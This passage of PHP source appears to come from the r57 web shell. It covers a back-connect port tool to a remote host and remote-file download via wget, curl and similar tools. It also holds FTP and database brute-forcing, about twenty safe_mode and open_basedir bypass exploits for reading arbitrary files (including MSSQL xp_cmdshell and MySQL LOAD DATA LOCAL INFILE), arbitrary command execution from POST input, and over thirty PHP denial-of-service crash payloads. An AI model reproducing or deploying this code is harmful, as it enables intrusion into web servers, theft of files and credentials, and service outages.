4908 $blah = ex('gcc -o '.$tempdir.'dpc '.$tempdir.'dpc.c');
4909
4910 @unlink($tempdir.'dpc.c');
4911
4912 $blah = ex($tempdir.'dpc '.$_POST['local_port'].' '.$_POST['remote_port'].' '.$_POST['remote_host'].' &');
4913
4914 @unlink($tempdir.'dpc');
4915
4916 $_POST['cmd']="ps -aux | grep dpc";
4917
4918}
4919
4920
4921
4922if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
4923
4924
4925
4926for($upl=0;$upl<=16;$upl++)
4927
4928{
4929
4930 if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
4931
4932 if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }
4933
4934 else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }
4935
4936 @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
4937
4938 or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
4939
4940 }
4941
4942}
4943
4944
4945
4946if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
4947
4948{
4949
4950 switch($_POST['with'])
4951
4952 {
4953
4954 case 'fopen':
4955
4956 $datafile = @implode("", @file($_POST['rem_file']));
4957
4958 if($datafile)
4959
4960 {
4961
4962 if(!morewrite($_POST['loc_file'],$datafile)){ err(0);};
4963
4964 }
4965
4966
4967
4968 $_POST['cmd'] = '';
4969
4970 break;
4971
4972 case 'wget':
4973
4974 $_POST['cmd'] = which('wget')." \"".$_POST['rem_file']."\" -O \"".$_POST['loc_file']."\"";
4975
4976 break;
4977
4978 case 'fetch':
4979
4980 $_POST['cmd'] = which('fetch')." -p \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\"";
4981
4982 break;
4983
4984 case 'lynx':
4985
4986 $_POST['cmd'] = which('lynx')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
4987
4988 break;
4989
4990 case 'links':
4991
4992 $_POST['cmd'] = which('links')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
4993
4994 break;
4995
4996 case 'GET':
4997
4998 $_POST['cmd'] = which('GET')." \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
4999
5000 break;
5001
5002 case 'curl':
5003
5004 $_POST['cmd'] = which('curl')." \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\"";
5005
5006 break;
5007
5008 }
5009
5010}
5011
5012if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down")))
5013
5014 {
5015
5016 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
5017
5018 if(empty($ftp_port)) { $ftp_port = 21; }
5019
5020 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
5021
5022 if(!$connection) { err(3); }
5023
5024 else
5025
5026 {
5027
5028 if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
5029
5030 else
5031
5032 {
5033
5034 if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}
5035
5036 if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}
5037
5038 }
5039
5040 }
5041
5042 @ftp_close($connection);
5043
5044 $_POST['cmd'] = "";
5045
5046 }
5047
5048
5049
5050if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute")))
5051
5052 {
5053
5054 if($_POST['cmd']=="ftp_brute"){
5055
5056 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
5057
5058 if(empty($ftp_port)) { $ftp_port = 21; }
5059
5060 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
5061
5062 }else if($_POST['cmd']=="db_brute"){
5063
5064 $connection = 1;
5065
5066 }
5067
5068 if(!$connection) { err(3); $_POST['cmd'] = ""; }
5069
5070 else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
5071
5072 else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
5073
5074 if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}
5075
5076 }
5077
5078
5079
5080echo $table_up3;
5081
5082if (empty($_POST['cmd']) && !$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
5083
5084else if(empty($_POST['cmd']) && $safe_mode){ $_POST['cmd']="safe_dir"; }
5085
5086echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
5087
5088if($safe_mode || $open_basedir)
5089
5090{
5091
5092 switch($_POST['cmd'])
5093
5094 {
5095
5096 case 'safe_dir':
5097
5098
5099
5100 if (@function_exists('scandir') && ($d=@scandir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
5101
5102 {
5103
5104 foreach ($d as $file)
5105
5106 {
5107
5108 if ($file=="." || $file=="..") continue;
5109
5110 @clearstatcache();
5111
5112 @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
5113
5114 if(!$unix){
5115
5116 echo date("d.m.Y H:i",$mtime);
5117
5118 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
5119
5120 }
5121
5122 else{
5123
5124 if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
5125
5126 $owner = @posix_getpwuid($uid);
5127
5128 $grgid = @posix_getgrgid($gid);
5129
5130 }else{$owner['name']=$grgid['name']='';}
5131
5132 echo $inode." ";
5133
5134 echo perms(@fileperms($file));
5135
5136 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
5137
5138 echo @date("d.m.Y H:i ",$mtime);
5139
5140 }
5141
5142 echo "$file\n";
5143
5144 }
5145
5146 }
5147
5148
5149
5150 elseif (@function_exists('dir') && ($d=@dir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
5151
5152 {
5153
5154 while (false!==($file=$d->read()))
5155
5156 {
5157
5158 if ($file=="." || $file=="..") continue;
5159
5160 @clearstatcache();
5161
5162 @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
5163
5164 if(!$unix){
5165
5166 echo date("d.m.Y H:i",$mtime);
5167
5168 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
5169
5170 }
5171
5172 else{
5173
5174 if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
5175
5176 $owner = @posix_getpwuid($uid);
5177
5178 $grgid = @posix_getgrgid($gid);
5179
5180 }else{$owner['name']=$grgid['name']='';}
5181
5182 echo $inode." ";
5183
5184 echo perms(@fileperms($file));
5185
5186 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
5187
5188 echo @date("d.m.Y H:i ",$mtime);
5189
5190 }
5191
5192 echo "$file\n";
5193
5194 }
5195
5196 $d->close();
5197
5198 }
5199
5200
5201
5202 elseif (@function_exists('opendir') && @function_exists('readdir') && ($d=@opendir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
5203
5204 {
5205
5206 while (false!==($file=@readdir($d)))
5207
5208 {
5209
5210 if ($file=="." || $file=="..") continue;
5211
5212 @clearstatcache();
5213
5214 @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
5215
5216 if(!$unix){
5217
5218 echo date("d.m.Y H:i",$mtime);
5219
5220 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
5221
5222 }
5223
5224 else{
5225
5226 if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
5227
5228 $owner = @posix_getpwuid($uid);
5229
5230 $grgid = @posix_getgrgid($gid);
5231
5232 }else{$owner['name']=$grgid['name']='';}
5233
5234 echo $inode." ";
5235
5236 echo perms(@fileperms($file));
5237
5238 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
5239
5240 echo @date("d.m.Y H:i ",$mtime);
5241
5242 }
5243
5244 echo "$file\n";
5245
5246 }
5247
5248 @closedir($d);
5249
5250 }
5251
5252
5253
5254 elseif(@function_exists('glob') && (isset($_POST['glob']) || !isset($_POST['realpath'])))
5255
5256 {
5257
5258 echo "PHP glob() listing directory Safe_mode bypass Exploit\r\n\r\n";
5259
5260 function eh($errno, $errstr, $errfile, $errline)
5261
5262 {
5263
5264 global $D, $c, $i;
5265
5266 preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
5267
5268 if($o){ $D[$c] = $o[2]; $c++;}
5269
5270 }
5271
5272 $error_reporting = @ini_get('error_reporting');
5273
5274 error_reporting(E_WARNING);
5275
5276 @ini_set("display_errors", 1);
5277
5278 @ini_alter("display_errors", 1);
5279
5280 $root = "/";
5281
5282 if($dir) $root = $dir;
5283
5284 $c = 0; $D = array();
5285
5286 @set_error_handler("eh");
5287
5288 $chars = "_-.0123456789abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
5289
5290 for($i=0; $i < strlen($chars); $i++)
5291
5292 {
5293
5294 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
5295
5296 $prevD = $D[count($D)-1];
5297
5298 @glob($path."*");
5299
5300 if($D[count($D)-1] != $prevD)
5301
5302 {
5303
5304 for($j=0; $j < strlen($chars); $j++)
5305
5306 {
5307
5308 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
5309
5310 $prevD2 = $D[count($D)-1];
5311
5312 @glob($path."*");
5313
5314 if($D[count($D)-1] != $prevD2)
5315
5316 {
5317
5318 for($p=0; $p < strlen($chars); $p++)
5319
5320 {
5321
5322 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
5323
5324 $prevD3 = $D[count($D)-1];
5325
5326 @glob($path."*");
5327
5328 if($D[count($D)-1] != $prevD3)
5329
5330 {
5331
5332 for($r=0; $r < strlen($chars); $r++)
5333
5334 {
5335
5336 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
5337
5338 @glob($path."*");
5339
5340 }
5341
5342 }
5343
5344 }
5345
5346 }
5347
5348 }
5349
5350 }
5351
5352 }
5353
5354 $D = array_unique($D);
5355
5356 foreach($D as $item) echo "{$item}\r\n";
5357
5358 echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
5359
5360 error_reporting($error_reporting);
5361
5362 }
5363
5364 elseif(@function_exists('realpath') && (!isset($_POST['glob']) || isset($_POST['realpath'])))
5365
5366 {
5367
5368 echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n";
5369
5370 if(!$dir){$dir='/etc/';};
5371
5372 if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';}
5373
5374 if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';}
5375
5376
5377
5378 if($realpath=realpath($dir.'/')){echo $realpath."\r\n";}
5379
5380 if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";}
5381
5382 foreach($presets_rlph as $preset_rlph){
5383
5384 if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";}
5385
5386 }
5387
5388 for($i=0; $i < strlen($chars_rlph); $i++){
5389
5390 if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";}
5391
5392 if($n_rlph<=1){continue;};
5393
5394 for($j=0; $j < strlen($chars_rlph); $j++){
5395
5396 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";}
5397
5398 if($n_rlph<=2){continue;};
5399
5400 for($x=0; $x < strlen($chars_rlph); $x++){
5401
5402 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";}
5403
5404 if($n_rlph<=3){continue;};
5405
5406 for($y=0; $y < strlen($chars_rlph); $y++){
5407
5408 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";}
5409
5410 if($n_rlph<=4){continue;};
5411
5412 for($z=0; $z < strlen($chars_rlph); $z++){
5413
5414 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";}
5415
5416 if($n_rlph<=5){continue;};
5417
5418 for($w=0; $w < strlen($chars_rlph); $w++){
5419
5420 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";}
5421
5422 }
5423
5424 }
5425
5426 }
5427
5428 }
5429
5430 }
5431
5432 }
5433
5434 echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
5435
5436 }
5437
5438 else echo $lang[$language.'_text29'];
5439
5440 break;
5441
5442 case 'test1':
5443
5444 $ci = @curl_init("file://".$_POST['test1_file']);
5445
5446 $cf = @curl_exec($ci);
5447
5448 echo htmlspecialchars($cf);
5449
5450 break;
5451
5452 case 'test2':
5453
5454 @include($_POST['test2_file']);
5455
5456 break;
5457
5458 case 'test3':
5459
5460 if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
5461
5462 $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
5463
5464 if($db)
5465
5466 {
5467
5468 if(@mysql_select_db($_POST['test3_md'],$db))
5469
5470 {
5471
5472 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
5473
5474 @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
5475
5476/* @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");*/
5477
5478 @mysql_query("LOAD DATA LOCAL INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
5479
5480 $r = @mysql_query("SELECT * FROM temp_r57_table");
5481
5482 while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
5483
5484 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
5485
5486 }
5487
5488 else echo "[-] ERROR! Can't select database";
5489
5490 @mysql_close($db);
5491
5492 }
5493
5494 else echo "[-] ERROR! Can't connect to mysql server";
5495
5496 break;
5497
5498 case 'test4':
5499
5500 if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
5501
5502 $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
5503
5504 if($db)
5505
5506 {
5507
5508 if(@mssql_select_db($_POST['test4_md'],$db))
5509
5510 {
5511
5512 @mssql_query("drop table r57_temp_table",$db);
5513
5514 @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
5515
5516 @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
5517
5518 $res = mssql_query("select * from r57_temp_table",$db);
5519
5520 while(($row=@mssql_fetch_row($res)))
5521
5522 {
5523
5524 echo htmlspecialchars($row[0])."\r\n";
5525
5526 }
5527
5528 @mssql_query("drop table r57_temp_table",$db);
5529
5530 }
5531
5532 else echo "[-] ERROR! Can't select database";
5533
5534 @mssql_close($db);
5535
5536 }
5537
5538 else echo "[-] ERROR! Can't connect to MSSQL server";
5539
5540 break;
5541
5542 case 'test5':
5543
5544 $temp=tempnam($dir, "fname");
5545
5546 if (@file_exists($temp)) @unlink($temp);
5547
5548 $extra = "-C ".$_POST['test5_file']." -X $temp";
5549
5550 @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
5551
5552 $str = moreread($temp);
5553
5554 echo htmlspecialchars($str);
5555
5556 @unlink($temp);
5557
5558 break;
5559
5560 case 'test6':
5561
5562 $stream = @imap_open('/etc/passwd', "", "");
5563
5564 $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
5565
5566 for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n";
5567
5568 @imap_close($stream);
5569
5570 break;
5571
5572 case 'test7':
5573
5574 $stream = @imap_open($_POST['test7_file'], "", "");
5575
5576 $str = @imap_body($stream, 1);
5577
5578 echo htmlspecialchars($str);
5579
5580 @imap_close($stream);
5581
5582 break;
5583
5584 case 'test8':
5585
5586 $temp=@tempnam($_POST['test8_file2'], "copytemp");
5587
5588 $str = readzlib($_POST['test8_file1'],$temp);
5589
5590 echo htmlspecialchars($str);
5591
5592 @unlink($temp);
5593
5594 break;
5595
5596 case 'test9':
5597
5598 @ini_restore("safe_mode");
5599
5600 @ini_restore("open_basedir");
5601
5602 $str = moreread($_POST['test9_file']);
5603
5604 echo htmlspecialchars($str);
5605
5606 break;
5607
5608 case 'test10':
5609
5610 @ob_clean();
5611
5612 $error_reporting = @ini_get('error_reporting');
5613
5614 error_reporting(E_ALL ^ E_NOTICE);
5615
5616 @ini_set("display_errors", 1);
5617
5618 @ini_alter("display_errors", 1);
5619
5620 $str=@fopen($_POST['test10_file'],"r");
5621
5622 while(!feof($str)){print htmlspecialchars(fgets($str));}
5623
5624 fclose($str);
5625
5626 error_reporting($error_reporting);
5627
5628 break;
5629
5630 case 'test11':
5631
5632 @ob_clean();
5633
5634 $temp = 'zip://'.$_POST['test11_file'];
5635
5636 $str = moreread($temp);
5637
5638 echo htmlspecialchars($str);
5639
5640 break;
5641
5642 case 'test12':
5643
5644 @ob_clean();
5645
5646 $temp = 'compress.bzip2://'.$_POST['test12_file'];
5647
5648 $str = moreread($temp);
5649
5650 echo htmlspecialchars($str);
5651
5652 break;
5653
5654 case 'test13':
5655
5656 @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']);
5657
5658 echo $lang[$language.'_text61'];
5659
5660 break;
5661
5662 case 'test14':
5663
5664 @session_save_path($_POST['test14_file2']."\0;$tempdir");
5665
5666 @session_start();
5667
5668 @$_SESSION[php]=$_POST['test14_file1'];
5669
5670 echo $lang[$language.'_text61'];
5671
5672 break;
5673
5674 case 'test15':
5675
5676 @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']);
5677
5678 echo $lang[$language.'_text61'];
5679
5680 break;
5681
5682 case 'test16':
5683
5684 if (@fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
5685
5686 break;
5687
5688 case 'test17_1':
5689
5690 @unlink('symlinkread');
5691
5692 @symlink('a/a/a/a/a/a/', 'dummy');
5693
5694 @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread');
5695
5696 @unlink('dummy');
5697
5698 while (1)
5699
5700 {
5701
5702 @symlink('.', 'dummy');
5703
5704 @unlink('dummy');
5705
5706 }
5707
5708 break;
5709
5710 case 'test17_2':
5711
5712 $str='';
5713
5714 while (strlen($str) < 3) {
5715
5716/* $str = moreread('symlinkread');*/
5717
5718 $str = @file_get_contents('symlinkread');
5719
5720 if($str){ @ob_clean(); echo htmlspecialchars($str);}
5721
5722 }
5723
5724 break;
5725
5726 case 'test17_3':
5727
5728 $dir = $files = array();
5729
5730 if(@version_compare(@phpversion(),"5.0.0")>=0){
5731
5732 while (@count($dir) < 3) {
5733
5734 $dir=@scandir('symlinkread');
5735
5736 if (@count($dir) > 2) {@ob_clean(); @print_r($dir); }
5737
5738 }
5739
5740 }
5741
5742 else {
5743
5744 while (@count($files) < 3) {
5745
5746 $dh = @opendir('symlinkread');
5747
5748 while (false !== ($filename = @readdir($dh))) {
5749
5750 $files[] = $filename;
5751
5752 }
5753
5754 if(@count($files) > 2){@ob_clean(); @print_r($files); }
5755
5756 }
5757
5758 }
5759
5760 break;
5761
5762 case 'test18':
5763
5764 @putenv("TMPDIR=".$_POST['test18_file2']);
5765
5766 @ini_set("session.save_path", "");
5767
5768 @ini_alter("session.save_path", "");
5769
5770 @session_start();
5771
5772 @$_SESSION[php]=$_POST['test18_file1'];
5773
5774 echo $lang[$language.'_text61'];
5775
5776 break;
5777
5778 case 'test19':
5779
5780 if(empty($_POST['test19_port'])) { $_POST['test19_port'] = "3306"; }
5781
5782 $m = new mysqli('localhost',$_POST['test19_ml'],$_POST['test19_mp'],$_POST['test19_md'],$_POST['test19_port']);
5783
5784 if(@mysqli_connect_errno()){ echo "[-] ERROR! Can't connect to mysqli server: ".mysqli_connect_error() ;};
5785
5786 $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
5787
5788 $m->set_local_infile_handler("r");
5789
5790 $m->query("DROP TABLE IF EXISTS temp_r57_table");
5791
5792 $m->query("CREATE TABLE temp_r57_table ( 'file' LONGBLOB NOT NULL )");
5793
5794 $m->query("LOAD DATA LOCAL INFILE \"".$_POST['test19_file']."\" INTO TABLE temp_r57_table");
5795
5796 $r = $m->query("SELECT * FROM temp_r57_table");
5797
5798 while(($r_sql = @mysqli_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
5799
5800 $m->query("DROP TABLE IF EXISTS temp_r57_table");
5801
5802 $m->close();
5803
5804 break;
5805
5806 }
5807
5808}
5809
5810
5811
5812if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){
5813
5814 $cmd_rep = ex($_POST['cmd']);
5815
5816 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
5817
5818 else { echo @htmlspecialchars($cmd_rep)."\n"; }
5819
5820}/*elseif($safe_mode){
5821
5822 $cmd_rep = safe_ex($_POST['cmd']);
5823
5824 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
5825
5826 else { echo @htmlspecialchars($cmd_rep)."\n"; }
5827
5828}
5829
5830*/
5831
5832switch($_POST['cmd'])
5833
5834{
5835
5836 case 'dos1':
5837
5838 function a() { a(); } a();
5839
5840 break;
5841
5842 case 'dos2':
5843
5844 @pack("d4294967297", 2);
5845
5846 break;
5847
5848 case 'dos3':
5849
5850 $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a)));
5851
5852 break;
5853
5854 case 'dos4':
5855
5856 $t = array(1);while (1) {$a[] = &$t;};
5857
5858 break;
5859
5860 case 'dos5':
5861
5862 @dl("sqlite.so");$db = new SqliteDatabase("foo");
5863
5864 break;
5865
5866 case 'dos6':
5867
5868 preg_match('/(.(?!b))*/', @str_repeat("a", 10000));
5869
5870 break;
5871
5872 case 'dos7':
5873
5874 @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));
5875
5876 break;
5877
5878 case 'dos8':
5879
5880 @shell_exec("killall -11 httpd");
5881
5882 break;
5883
5884 case 'dos9':
5885
5886 function cx(){ @tempnam("/www/", '../../../../../..'.$tempdir.'cx'); cx(); } cx();
5887
5888 break;
5889
5890 case 'dos10':
5891
5892 $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);
5893
5894 break;
5895
5896 case 'dos11':
5897
5898 @array_fill(1,123456789,"Infigo-IS");
5899
5900 break;
5901
5902 case 'dos12':
5903
5904 @substr_compare("A","A",12345678);
5905
5906 break;
5907
5908 case 'dos13':
5909
5910 @unserialize("a:2147483649:{");
5911
5912 break;
5913
5914 case 'dos14':
5915
5916 $Data = @str_ireplace("\n", "<br>", $Data);
5917
5918 break;
5919
5920 case 'dos15':
5921
5922 function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);}
5923
5924 $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);}
5925
5926 @htmlentities($str1, ENT_NOQUOTES, "UTF-8");
5927
5928 break;
5929
5930 case 'dos16':
5931
5932 $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e);
5933
5934 for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));
5935
5936 unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]);
5937
5938 break;
5939
5940 case 'dos17':
5941
5942 $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";
5943
5944 $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
5945
5946 $x = "AQ ";
5947
5948 unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);
5949
5950 break;
5951
5952 case 'dos18':
5953
5954 $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600);
5955
5956 if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err))
5957
5958 echo "Msg not sent because $msg_err\n";
5959
5960 if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {
5961
5962 echo "$msg\n";
5963
5964 } else { echo "Received $msg_error fetching message\n"; break; }
5965
5966 @msg_remove_queue ($msg_id);
5967
5968 break;
5969
5970 case 'dos19':
5971
5972 $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r");
5973
5974 break;
5975
5976 case 'dos20':
5977
5978 $hashtable = str_repeat("A", 39);
5979
5980 $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);
5981
5982 $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);
5983
5984 $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
5985
5986 for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; }
5987
5988 $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';
5989
5990 @unserialize($str);
5991
5992 break;
5993
5994 case 'dos21':
5995
5996 imagecreatetruecolor(1234,1073741824);
5997
5998 break;
5999
6000 case 'dos22':
6001
6002 imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),imagecreatetruecolor(120, 120), 0, 0, 0, 0, 0x7fffffff, 120, 120, 120);
6003
6004 break;
6005
6006 case 'dos23':
6007
6008 $a = str_repeat ("A",9989776); $b = str_repeat("/", 2798349); iconv_substr($a,0,1,$b);
6009
6010 break;
6011
6012 case 'dos24':
6013
6014 setlocale(LC_COLLATE, str_repeat("A", 34438013));
6015
6016 break;
6017
6018 case 'dos25':
6019
6020 glob(str_repeat("A", 9638013));
6021
6022 break;
6023
6024 case 'dos26':
6025
6026 glob("a",-1);
6027
6028 break;
6029
6030 case 'dos27':
6031
6032 fnmatch("*[1]e", str_repeat("A", 9638013));
6033
6034 break;
6035
6036 case 'dos28':
6037
6038 if (extension_loaded("gd")){ $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n";}
6039
6040 break;
6041
6042 case 'dos29':
6043
6044 if(function_exists('msql_connect')){ msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A',49424).'BBBB');}
6045
6046 break;
6047
6048 case 'dos30':
6049
6050 $a=str_repeat("A", 65535); $b=1; $c=str_repeat("A", 65535); chunk_split($a,$b,$c);
6051
6052 break;
6053
6054 case 'dos31':
6055
6056 if (extension_loaded("win32std") ) { win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );}
6057
6058 break;
6059
6060 case 'dos32':
6061
6062 if (extension_loaded( "iisfunc" ) ){ $buf_unicode = str_repeat( "A", 256 ); $eip_unicode = "\x41\x41"; iis_getservicestate( $buf_unicode . $eip_unicode );}
6063
6064 break;
6065
6066 case 'dos33':
6067
